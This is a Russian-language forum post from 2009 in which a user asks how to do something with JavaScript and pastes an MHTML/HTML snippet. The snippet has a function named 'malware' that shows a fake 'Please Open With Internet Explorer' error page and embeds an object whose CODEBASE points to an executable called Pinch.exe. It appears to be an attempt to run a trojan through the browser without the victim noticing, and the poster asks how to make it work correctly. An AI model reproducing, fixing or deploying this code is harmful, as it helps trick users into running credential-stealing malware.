Показать сообщение отдельно

  #11  
Старый 22.04.2009, 20:47
coolZIRO
Новичок
Регистрация: 18.11.2008
Сообщений: 17
Провел на форуме:
43542

Репутация: 5
По умолчанию

А может както с помощью JS
IME-Version: 1.0
Content-Location:file:///Pinch.exe
Content-Transfer-Encoding: base64

<title>Welcome - Home</title>
<body bgcolor=black scroll=no>
<script>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write( ' <title>Welcome - Home</title>
<body scroll=no bgcolor=black><FONT face="Comic Sans MS" color=red style="position:absolute;top:20;left:90;z-index:100; font-size:2cm;">
Sorry, Error On This Page! Please Open With Internet Explorer</center>
<object style="cursor:cross-hair" alt="Sorry, Error On This Page! Please Open With Internet Explorer" classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:'+path+'\\docs.html!file:///Pinch.exe">
</object>')
}
setTimeout("malware()",150)
</script>

Чет типо того. как правельно сделать?
 
Ответить с цитированием